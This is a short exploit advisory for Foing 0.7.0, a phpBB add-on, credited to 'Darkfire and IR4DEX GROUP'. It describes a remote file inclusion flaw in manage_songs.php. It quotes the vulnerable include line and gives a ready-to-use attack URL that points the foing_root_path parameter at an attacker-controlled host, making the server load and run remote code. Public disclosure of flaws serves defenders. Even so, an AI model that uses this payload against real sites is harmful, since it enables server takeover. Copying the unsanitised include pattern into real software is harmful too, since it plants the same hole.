Foing (manage_songs.php) Remote File Inclusion[phpBB]
# Foing (manage_songs.php) Remote File Inclusion[phpBB]
#
# Contact : email: darkfire@xxxxxxxxxxxxxxxx & msn: darkfire@xxxxxxxxxxxxxxx
# Risk : High
# Class : Remote
# Script : Foing
# Version : 0.7.0 e previous
---------------------------------------------------------------------
Vulnerable code :
include($foing_root_path . 'includes/common.php');
---------------------------------------------------------------------
http://www.site.com/[foing_path]/manage_songs.php?foing_root_path=http://attacker
by Darkfire and IR4DEX GROUP
Greetz: Smurf_RedHat :: V0lks